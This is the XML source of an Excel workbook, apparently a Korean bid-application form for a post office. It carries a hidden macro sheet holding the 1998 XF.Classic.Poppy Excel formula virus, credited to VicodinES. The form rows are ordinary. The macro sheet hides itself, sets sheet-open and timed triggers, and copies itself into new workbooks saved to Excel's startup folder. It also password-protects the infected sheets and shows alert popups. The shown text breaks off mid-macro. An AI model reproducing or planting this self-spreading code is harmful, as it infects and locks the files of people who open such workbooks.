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유가물\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <x:bookViews>
    <x:workbookView xWindow="0" yWindow="0" windowWidth="18945" windowHeight="10620"/>
  </x:bookViews>
  <x:sheets>
    <x:sheet name="신청서" sheetId="1" r:id="rId4"/>
    <x:sheet name="VXXXXXXX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<x:sst xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:x="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="23" uniqueCount="23">
  <x:si>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**Auto and On Sheet Starts Here**</x:t>
  </x:si>
  <x:si>
    <x:t>C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\xlstart\Book1.</x:t>
  </x:si>
  <x:si>
    <x:t>**Add New Workbook, Infect It, Save It As Book1.xls**</x:t>
  </x:si>
  <x:si>
    <x:t>상기와 같이 물품을 구입하고자 신청합니다.</x:t>
  </x:si>
  <x:si>
    <x:t>**Infect Workbook**</x:t>
  </x:si>
  <x:si>
    <x:t>성             명 :</x:t>
  </x:si>
  <x:si>
    <x:t>**Simple Payload**</x:t>
  </x:si>
  <x:si>
    <x:t>Hydrocodone/APAP 10-650 For Your Computer</x:t>
  </x:si>
  <x:si>
    <x:t>An Excel Formula Macro Virus (XF.Classic)</x:t>
  </x:si>
  <x:si>
    <x:t>보고2001하기피복.xls?down_num=986276279&amp;board=cug12_66&amp;command=down_load&amp;filename=보고2001하기피복.xls</x:t>
  </x:si>
  <x:si>
    <x:t>(C) The Narkotic Network 1998</x:t>
  </x:si>
  <x:si>
    <x:t>**Set Our Values and Paths**</x:t>
  </x:si>
  <x:si>
    <x:t>With Lord Natas</x:t>
  </x:si>
  <x:si>
    <x:t>(서명)</x:t>
  </x:si>
  <x:si>
    <x:t>수  량 :</x:t>
  </x:si>
  <x:si>
    <x:t>입찰희망가 :</x:t>
  </x:si>
  <x:si>
    <x:t>품  명 :</x:t>
  </x:si>
  <x:si>
    <x:t>Sheet1</x:t>
  </x:si>
  <x:si>
    <x:t>보령우체국장 귀하</x:t>
  </x:si>
  <x:si>
    <x:t>입 찰 신 청 서</x:t>
  </x:si>
  <x:si>
    <x:t>신 청 인 전화 :</x:t>
  </x:si>
  <x:si>
    <x:t>신 청 인 주소 :</x:t>
  </x:si>
  <x:si>
    <x:t>Classic.Poppy by VicodinES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</x:si>
</x:sst>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38" fontId="0" fillId="0" borderId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
  </x:cellStyleXfs>
  <x:cellXfs count="22"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2" borderId="0" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="6" fillId="2" borderId="0" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="6" fillId="3" borderId="1" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="6" fillId="4" borderId="2" xfId="1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5" borderId="3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5" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
          <x:alignment horizontal="center" vertical="bottom"/>
        </x:xf>
      </mc:Fallback>
    </mc:AlternateContent>
    <x:xf numFmtId="0" fontId="6" fillId="4" borderId="6" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="6" fillId="3" borderId="7" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="6" fillId="4" borderId="7" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="6" fillId="3" borderId="8" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="bottom"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="1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7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="11" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <x:alignment horizontal="general" vertical="center"/>
    </x:xf>
    <x:xf numFmtId="0" fontId="13" fillId="7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콤마 [0]_~MF363C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I50"/>
  <x:sheetViews>
    <x:sheetView tabSelected="1" topLeftCell="A1" zoomScale="90" zoomScaleNormal="90" zoomScaleSheetLayoutView="90" workbookViewId="0">
      <x:selection activeCell="E7" activeCellId="0" sqref="E7:E7"/>
    </x:sheetView>
  </x:sheetViews>
  <x:sheetFormatPr defaultColWidth="9.33203125" defaultRowHeight="11.94999999999999928946"/>
  <x:cols>
    <x:col min="1" max="1" width="3.33203125" style="14" customWidth="1"/>
    <x:col min="2" max="2" width="12.33203125" style="14" customWidth="1"/>
    <x:col min="3" max="256" width="9.33203125" style="14"/>
  </x:cols>
  <x:sheetData>
    <x:row r="1" spans="2:9" ht="12" customHeight="1">
      <x:c r="B1" s="16"/>
      <x:c r="C1" s="16"/>
      <x:c r="D1" s="16"/>
      <x:c r="E1" s="16"/>
      <x:c r="F1" s="16"/>
      <x:c r="G1" s="16"/>
      <x:c r="H1" s="16"/>
      <x:c r="I1" s="16"/>
    </x:row>
    <x:row r="2" spans="2:9" ht="27" customHeight="1">
      <x:c r="B2" s="21" t="s">
        <x:v>19</x:v>
      </x:c>
      <x:c r="C2" s="21"/>
      <x:c r="D2" s="21"/>
      <x:c r="E2" s="21"/>
      <x:c r="F2" s="21"/>
      <x:c r="G2" s="21"/>
      <x:c r="H2" s="21"/>
      <x:c r="I2" s="21"/>
    </x:row>
    <x:row r="3" spans="2:9" ht="12" customHeight="1">
      <x:c r="B3" s="17"/>
      <x:c r="C3" s="17"/>
      <x:c r="D3" s="17"/>
      <x:c r="E3" s="17"/>
      <x:c r="F3" s="17"/>
      <x:c r="G3" s="17"/>
      <x:c r="H3" s="17"/>
      <x:c r="I3" s="17"/>
    </x:row>
    <x:row r="4" spans="2:9" ht="42" customHeight="1">
      <x:c r="B4" s="17"/>
      <x:c r="C4" s="17"/>
      <x:c r="D4" s="17"/>
      <x:c r="E4" s="17"/>
      <x:c r="F4" s="17"/>
      <x:c r="G4" s="17"/>
      <x:c r="H4" s="17"/>
      <x:c r="I4" s="17"/>
    </x:row>
    <x:row r="5" spans="2:9" ht="12" customHeight="1">
      <x:c r="B5" s="17"/>
      <x:c r="C5" s="17"/>
      <x:c r="D5" s="17"/>
      <x:c r="E5" s="17"/>
      <x:c r="F5" s="17"/>
      <x:c r="G5" s="17"/>
      <x:c r="H5" s="17"/>
      <x:c r="I5" s="17"/>
    </x:row>
    <x:row r="6" spans="2:2" s="19" customFormat="1" ht="24.94999999999999928946" customHeight="1">
      <x:c r="B6" s="20" t="s">
        <x:v>16</x:v>
      </x:c>
    </x:row>
    <x:row r="7" spans="2:2" s="19" customFormat="1" ht="24.94999999999999928946" customHeight="1">
      <x:c r="B7" s="20" t="s">
        <x:v>14</x:v>
      </x:c>
    </x:row>
    <x:row r="8" spans="2:2" s="19" customFormat="1" ht="24.94999999999999928946" customHeight="1">
      <x:c r="B8" s="20" t="s">
        <x:v>15</x:v>
      </x:c>
    </x:row>
    <x:row r="9" spans="2:2" s="19" customFormat="1" ht="24.94999999999999928946" customHeight="1">
      <x:c r="B9" s="20"/>
    </x:row>
    <x:row r="10" s="19" customFormat="1" ht="24.94999999999999928946" customHeight="1"/>
    <x:row r="11" s="19" customFormat="1" ht="24.94999999999999928946" customHeight="1"/>
    <x:row r="12" spans="2:2" s="19" customFormat="1" ht="24.94999999999999928946" customHeight="1">
      <x:c r="B12" s="20" t="s">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="13" s="19" customFormat="1" ht="24.94999999999999928946" customHeight="1"/>
    <x:row r="14" s="19" customFormat="1" ht="24.94999999999999928946" customHeight="1"/>
    <x:row r="15" s="19" customFormat="1" ht="24.94999999999999928946" customHeight="1"/>
    <x:row r="16" spans="2:2" s="19" customFormat="1" ht="24.94999999999999928946" customHeight="1">
      <x:c r="B16" s="20" t="s">
        <x:v>21</x:v>
      </x:c>
    </x:row>
    <x:row r="17" spans="2:7" s="19" customFormat="1" ht="24.94999999999999928946" customHeight="1">
      <x:c r="B17" s="20" t="s">
        <x:v>5</x:v>
      </x:c>
      <x:c r="G17" s="20" t="s">
        <x:v>13</x:v>
      </x:c>
    </x:row>
    <x:row r="18" spans="2:2" s="19" customFormat="1" ht="24.94999999999999928946" customHeight="1">
      <x:c r="B18" s="20" t="s">
        <x:v>20</x:v>
      </x:c>
    </x:row>
    <x:row r="19" spans="2:9" s="15" customFormat="1" ht="24.94999999999999928946" customHeight="1">
      <x:c r="B19" s="18"/>
      <x:c r="C19" s="18"/>
      <x:c r="D19" s="18"/>
      <x:c r="E19" s="18"/>
      <x:c r="F19" s="18"/>
      <x:c r="G19" s="18"/>
      <x:c r="H19" s="18"/>
      <x:c r="I19" s="18"/>
    </x:row>
    <x:row r="20" spans="2:9" ht="24.94999999999999928946" customHeight="1">
      <x:c r="B20" s="17"/>
      <x:c r="C20" s="17"/>
      <x:c r="D20" s="17"/>
      <x:c r="E20" s="17"/>
      <x:c r="F20" s="17"/>
      <x:c r="G20" s="17"/>
      <x:c r="H20" s="17"/>
      <x:c r="I20" s="17"/>
    </x:row>
    <x:row r="21" spans="2:9" ht="24.94999999999999928946" customHeight="1">
      <x:c r="B21" s="17"/>
      <x:c r="C21" s="17"/>
      <x:c r="D21" s="17"/>
      <x:c r="E21" s="17"/>
      <x:c r="F21" s="17"/>
      <x:c r="G21" s="17"/>
      <x:c r="H21" s="17"/>
      <x:c r="I21" s="17"/>
    </x:row>
    <x:row r="22" spans="2:9" ht="24.94999999999999928946" customHeight="1">
      <x:c r="B22" s="21" t="s">
        <x:v>18</x:v>
      </x:c>
      <x:c r="C22" s="21"/>
      <x:c r="D22" s="21"/>
      <x:c r="E22" s="21"/>
      <x:c r="F22" s="21"/>
      <x:c r="G22" s="21"/>
      <x:c r="H22" s="21"/>
      <x:c r="I22" s="21"/>
    </x:row>
    <x:row r="23" spans="2:9" ht="24.94999999999999928946" customHeight="1">
      <x:c r="B23" s="16"/>
      <x:c r="C23" s="16"/>
      <x:c r="D23" s="16"/>
      <x:c r="E23" s="16"/>
      <x:c r="F23" s="16"/>
      <x:c r="G23" s="16"/>
      <x:c r="H23" s="16"/>
      <x:c r="I23" s="16"/>
    </x:row>
    <x:row r="24" spans="2:9" ht="24.94999999999999928946" customHeight="1">
      <x:c r="B24" s="16"/>
      <x:c r="C24" s="16"/>
      <x:c r="D24" s="16"/>
      <x:c r="E24" s="16"/>
      <x:c r="F24" s="16"/>
      <x:c r="G24" s="16"/>
      <x:c r="H24" s="16"/>
      <x:c r="I24" s="16"/>
    </x:row>
    <x:row r="25" spans="2:9" ht="12" customHeight="1">
      <x:c r="B25" s="16"/>
      <x:c r="C25" s="16"/>
      <x:c r="D25" s="16"/>
      <x:c r="E25" s="16"/>
      <x:c r="F25" s="16"/>
      <x:c r="G25" s="16"/>
      <x:c r="H25" s="16"/>
      <x:c r="I25" s="16"/>
    </x:row>
    <x:row r="26" spans="2:9" ht="12" customHeight="1">
      <x:c r="B26" s="16"/>
      <x:c r="C26" s="16"/>
      <x:c r="D26" s="16"/>
      <x:c r="E26" s="16"/>
      <x:c r="F26" s="16"/>
      <x:c r="G26" s="16"/>
      <x:c r="H26" s="16"/>
      <x:c r="I26" s="16"/>
    </x:row>
    <x:row r="27" spans="2:9" ht="12" customHeight="1">
      <x:c r="B27" s="16"/>
      <x:c r="C27" s="16"/>
      <x:c r="D27" s="16"/>
      <x:c r="E27" s="16"/>
      <x:c r="F27" s="16"/>
      <x:c r="G27" s="16"/>
      <x:c r="H27" s="16"/>
      <x:c r="I27" s="16"/>
    </x:row>
    <x:row r="28" spans="2:9" ht="12" customHeight="1">
      <x:c r="B28" s="16"/>
      <x:c r="C28" s="16"/>
      <x:c r="D28" s="16"/>
      <x:c r="E28" s="16"/>
      <x:c r="F28" s="16"/>
      <x:c r="G28" s="16"/>
      <x:c r="H28" s="16"/>
      <x:c r="I28" s="16"/>
    </x:row>
    <x:row r="29" spans="2:9" ht="12" customHeight="1">
      <x:c r="B29" s="16"/>
      <x:c r="C29" s="16"/>
      <x:c r="D29" s="16"/>
      <x:c r="E29" s="16"/>
      <x:c r="F29" s="16"/>
      <x:c r="G29" s="16"/>
      <x:c r="H29" s="16"/>
      <x:c r="I29" s="16"/>
    </x:row>
    <x:row r="30" spans="2:9" ht="12" customHeight="1">
      <x:c r="B30" s="16"/>
      <x:c r="C30" s="16"/>
      <x:c r="D30" s="16"/>
      <x:c r="E30" s="16"/>
      <x:c r="F30" s="16"/>
      <x:c r="G30" s="16"/>
      <x:c r="H30" s="16"/>
      <x:c r="I30" s="16"/>
    </x:row>
    <x:row r="31" spans="2:9" ht="12" customHeight="1">
      <x:c r="B31" s="16"/>
      <x:c r="C31" s="16"/>
      <x:c r="D31" s="16"/>
      <x:c r="E31" s="16"/>
      <x:c r="F31" s="16"/>
      <x:c r="G31" s="16"/>
      <x:c r="H31" s="16"/>
      <x:c r="I31" s="16"/>
    </x:row>
    <x:row r="32" spans="2:9" ht="12" customHeight="1">
      <x:c r="B32" s="16"/>
      <x:c r="C32" s="16"/>
      <x:c r="D32" s="16"/>
      <x:c r="E32" s="16"/>
      <x:c r="F32" s="16"/>
      <x:c r="G32" s="16"/>
      <x:c r="H32" s="16"/>
      <x:c r="I32" s="16"/>
    </x:row>
    <x:row r="33" spans="2:9" ht="12" customHeight="1">
      <x:c r="B33" s="16"/>
      <x:c r="C33" s="16"/>
      <x:c r="D33" s="16"/>
      <x:c r="E33" s="16"/>
      <x:c r="F33" s="16"/>
      <x:c r="G33" s="16"/>
      <x:c r="H33" s="16"/>
      <x:c r="I33" s="16"/>
    </x:row>
    <x:row r="34" spans="2:9" ht="12" customHeight="1">
      <x:c r="B34" s="16"/>
      <x:c r="C34" s="16"/>
      <x:c r="D34" s="16"/>
      <x:c r="E34" s="16"/>
      <x:c r="F34" s="16"/>
      <x:c r="G34" s="16"/>
      <x:c r="H34" s="16"/>
      <x:c r="I34" s="16"/>
    </x:row>
    <x:row r="35" spans="2:9" ht="12" customHeight="1">
      <x:c r="B35" s="16"/>
      <x:c r="C35" s="16"/>
      <x:c r="D35" s="16"/>
      <x:c r="E35" s="16"/>
      <x:c r="F35" s="16"/>
      <x:c r="G35" s="16"/>
      <x:c r="H35" s="16"/>
      <x:c r="I35" s="16"/>
    </x:row>
    <x:row r="36" spans="2:9" ht="12" customHeight="1">
      <x:c r="B36" s="16"/>
      <x:c r="C36" s="16"/>
      <x:c r="D36" s="16"/>
      <x:c r="E36" s="16"/>
      <x:c r="F36" s="16"/>
      <x:c r="G36" s="16"/>
      <x:c r="H36" s="16"/>
      <x:c r="I36" s="16"/>
    </x:row>
    <x:row r="37" spans="2:9" ht="12" customHeight="1">
      <x:c r="B37" s="16"/>
      <x:c r="C37" s="16"/>
      <x:c r="D37" s="16"/>
      <x:c r="E37" s="16"/>
      <x:c r="F37" s="16"/>
      <x:c r="G37" s="16"/>
      <x:c r="H37" s="16"/>
      <x:c r="I37" s="16"/>
    </x:row>
    <x:row r="38" spans="2:9" ht="12" customHeight="1">
      <x:c r="B38" s="16"/>
      <x:c r="C38" s="16"/>
      <x:c r="D38" s="16"/>
      <x:c r="E38" s="16"/>
      <x:c r="F38" s="16"/>
      <x:c r="G38" s="16"/>
      <x:c r="H38" s="16"/>
      <x:c r="I38" s="16"/>
    </x:row>
    <x:row r="39" spans="2:9" ht="12" customHeight="1">
      <x:c r="B39" s="16"/>
      <x:c r="C39" s="16"/>
      <x:c r="D39" s="16"/>
      <x:c r="E39" s="16"/>
      <x:c r="F39" s="16"/>
      <x:c r="G39" s="16"/>
      <x:c r="H39" s="16"/>
      <x:c r="I39" s="16"/>
    </x:row>
    <x:row r="40" spans="2:9" ht="12" customHeight="1">
      <x:c r="B40" s="16"/>
      <x:c r="C40" s="16"/>
      <x:c r="D40" s="16"/>
      <x:c r="E40" s="16"/>
      <x:c r="F40" s="16"/>
      <x:c r="G40" s="16"/>
      <x:c r="H40" s="16"/>
      <x:c r="I40" s="16"/>
    </x:row>
    <x:row r="41" spans="2:9" ht="12" customHeight="1">
      <x:c r="B41" s="16"/>
      <x:c r="C41" s="16"/>
      <x:c r="D41" s="16"/>
      <x:c r="E41" s="16"/>
      <x:c r="F41" s="16"/>
      <x:c r="G41" s="16"/>
      <x:c r="H41" s="16"/>
      <x:c r="I41" s="16"/>
    </x:row>
    <x:row r="42" spans="2:9" ht="12" customHeight="1">
      <x:c r="B42" s="16"/>
      <x:c r="C42" s="16"/>
      <x:c r="D42" s="16"/>
      <x:c r="E42" s="16"/>
      <x:c r="F42" s="16"/>
      <x:c r="G42" s="16"/>
      <x:c r="H42" s="16"/>
      <x:c r="I42" s="16"/>
    </x:row>
    <x:row r="43" spans="2:9" ht="12" customHeight="1">
      <x:c r="B43" s="16"/>
      <x:c r="C43" s="16"/>
      <x:c r="D43" s="16"/>
      <x:c r="E43" s="16"/>
      <x:c r="F43" s="16"/>
      <x:c r="G43" s="16"/>
      <x:c r="H43" s="16"/>
      <x:c r="I43" s="16"/>
    </x:row>
    <x:row r="44" spans="2:9" ht="12" customHeight="1">
      <x:c r="B44" s="16"/>
      <x:c r="C44" s="16"/>
      <x:c r="D44" s="16"/>
      <x:c r="E44" s="16"/>
      <x:c r="F44" s="16"/>
      <x:c r="G44" s="16"/>
      <x:c r="H44" s="16"/>
      <x:c r="I44" s="16"/>
    </x:row>
    <x:row r="45" spans="2:9" ht="12" customHeight="1">
      <x:c r="B45" s="16"/>
      <x:c r="C45" s="16"/>
      <x:c r="D45" s="16"/>
      <x:c r="E45" s="16"/>
      <x:c r="F45" s="16"/>
      <x:c r="G45" s="16"/>
      <x:c r="H45" s="16"/>
      <x:c r="I45" s="16"/>
    </x:row>
    <x:row r="46" spans="2:9" ht="12" customHeight="1">
      <x:c r="B46" s="16"/>
      <x:c r="C46" s="16"/>
      <x:c r="D46" s="16"/>
      <x:c r="E46" s="16"/>
      <x:c r="F46" s="16"/>
      <x:c r="G46" s="16"/>
      <x:c r="H46" s="16"/>
      <x:c r="I46" s="16"/>
    </x:row>
    <x:row r="47" spans="2:9" ht="12" customHeight="1">
      <x:c r="B47" s="16"/>
      <x:c r="C47" s="16"/>
      <x:c r="D47" s="16"/>
      <x:c r="E47" s="16"/>
      <x:c r="F47" s="16"/>
      <x:c r="G47" s="16"/>
      <x:c r="H47" s="16"/>
      <x:c r="I47" s="16"/>
    </x:row>
    <x:row r="48" spans="2:9" ht="12" customHeight="1">
      <x:c r="B48" s="16"/>
      <x:c r="C48" s="16"/>
      <x:c r="D48" s="16"/>
      <x:c r="E48" s="16"/>
      <x:c r="F48" s="16"/>
      <x:c r="G48" s="16"/>
      <x:c r="H48" s="16"/>
      <x:c r="I48" s="16"/>
    </x:row>
    <x:row r="49" spans="2:9" ht="12" customHeight="1">
      <x:c r="B49" s="16"/>
      <x:c r="C49" s="16"/>
      <x:c r="D49" s="16"/>
      <x:c r="E49" s="16"/>
      <x:c r="F49" s="16"/>
      <x:c r="G49" s="16"/>
      <x:c r="H49" s="16"/>
      <x:c r="I49" s="16"/>
    </x:row>
    <x:row r="50" spans="2:9" ht="12" customHeight="1">
      <x:c r="B50" s="16"/>
      <x:c r="C50" s="16"/>
      <x:c r="D50" s="16"/>
      <x:c r="E50" s="16"/>
      <x:c r="F50" s="16"/>
      <x:c r="G50" s="16"/>
      <x:c r="H50" s="16"/>
      <x:c r="I50" s="16"/>
    </x:row>
  </x:sheetData>
  <x:mergeCells count="2">
    <x:mergeCell ref="B2:I2"/>
    <x:mergeCell ref="B22:I22"/>
  </x:mergeCells>
  <x:printOptions horizontalCentered="1" verticalCentered="1" headings="0" gridLines="0" gridLinesSet="1"/>
  <x:pageMargins left="0.74805557727813720703" right="0.74805557727813720703" top="0.98430556058883666992" bottom="0.98430556058883666992" header="0.5" footer="0.5"/>
  <x:pageSetup paperSize="9" scale="11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C41"/>
  <x:sheetViews>
    <x:sheetView topLeftCell="A1" zoomScaleNormal="100" zoomScaleSheetLayoutView="100" workbookViewId="0">
      <x:selection activeCell="C1" activeCellId="0" sqref="C1:C1"/>
    </x:sheetView>
  </x:sheetViews>
  <x:sheetFormatPr defaultColWidth="10.6640625" defaultRowHeight="13.19999999999999928946"/>
  <x:cols>
    <x:col min="1" max="1" width="34.83203125" style="2" customWidth="1"/>
    <x:col min="2" max="2" width="1.5" style="2" customWidth="1"/>
    <x:col min="3" max="3" width="37.5" style="2" customWidth="1"/>
    <x:col min="4" max="256" width="10.6640625" style="2"/>
  </x:cols>
  <x:sheetData>
    <x:row r="1" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A1" s="1" t="s">
        <x:v>17</x:v>
      </x:c>
      <x:c r="C1" s="2" t="e">
        <x:f>WORKBOOK.HIDE("XL4Poppy")</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="2" spans="1:1" ht="13.5" customHeight="1">
      <x:c r="A2" s="1" t="s">
        <x:v>9</x:v>
      </x:c>
    </x:row>
    <x:row r="3" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A3" s="3" t="s">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C3" s="4" t="s">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="4" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A4" s="3" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C4" s="5" t="e">
        <x:f>RUN(C18)</x:f>
        <x:v>#N/A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22</x:v>
      </x:c>
      <x:c r="C7" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="8" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A8" s="7" t="s">
        <x:v>12</x:v>
      </x:c>
      <x:c r="C8" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="9" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A9" s="8" t="s">
        <x:v>8</x:v>
      </x:c>
      <x:c r="C9" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="10" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A10" s="7" t="s">
        <x:v>7</x:v>
      </x:c>
      <x:c r="C10" s="5" t="e">
        <x:f>RUN(A21)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="11" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A11" s="9" t="s">
        <x:v>10</x:v>
      </x:c>
      <x:c r="C11" s="5" t="e">
        <x:f>ON.TIME("6:30:00 PM","Hello")</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="12" spans="3:3" ht="12.75" customHeight="1">
      <x:c r="C12" s="5" t="e">
        <x:f>ON.TIME("6:30:00 AM","Morning")</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="13" spans="3:3" ht="13.5" customHeight="1">
      <x:c r="C13" s="5" t="e">
        <x:f>ON.SHEET(,"Poppy",TRUE)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="14" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A14" s="4" t="s">
        <x:v>6</x:v>
      </x:c>
      <x:c r="C14" s="10" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="15" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A15" s="5" t="e">
        <x:f>ALERT("XF.Classic.Poppy by VicodinES",2)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="16" spans="1:1" ht="13.5" customHeight="1">
      <x:c r="A16" s="5" t="e">
        <x:f>ALERT("ⓒ 1998 The Narkotic Network",2)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="17" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A17" s="10" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C17" s="4" t="s">
        <x:v>11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2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#N/A</x:v>
      </x:c>
      <x:c r="C26" s="13" t="s">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="27" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A27" s="5" t="e">
        <x:f>WORKBOOK.INSERT(1)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C27" s="5" t="e">
        <x:f>RUN(C19)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="28" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A28" s="5" t="e">
        <x:f>WORKBOOK.INSERT(1)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C28" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="29" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A29" s="5" t="e">
        <x:f>ACTIVATE.PREV()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C29" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="30" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A30" s="5" t="e">
        <x:f>RUN(C18)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C30" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="31" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A31" s="5" t="e">
        <x:f>WORKBOOK.COPY("XL4Poppy",A1)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C31" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="32" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A32" s="5" t="e">
        <x:f>WORKBOOK.NAME("Sheet3","Sheet99")</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C32" s="5" t="e">
        <x:f>ACTIVATE.PREV()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="33" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A33" s="5" t="e">
        <x:f>WORKBOOK.NAME("Sheet1","Sheet3")</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C33" s="5" t="e">
        <x:f>RUN(C19)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="34" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A34" s="5" t="e">
        <x:f>WORKBOOK.NAME("Sheet99","Sheet1")</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C34" s="5" t="e">
        <x:f>WORKBOOK.COPY("XL4Poppy",A1)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="35" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A35" s="5" t="e">
        <x:f>PROTECT.DOCUMENT(TRUE,,"VicodinES",TRUE)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C35" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="36" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A36" s="5" t="e">
        <x:f>WORKBOOK.PREV()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C36" s="10" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="37" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A37" s="5" t="e">
        <x:f>WORKBOOK.PREV()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="38" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A38" s="5" t="e">
        <x:f>WORKBOOK.PREV()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="39" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A39" s="5" t="e">
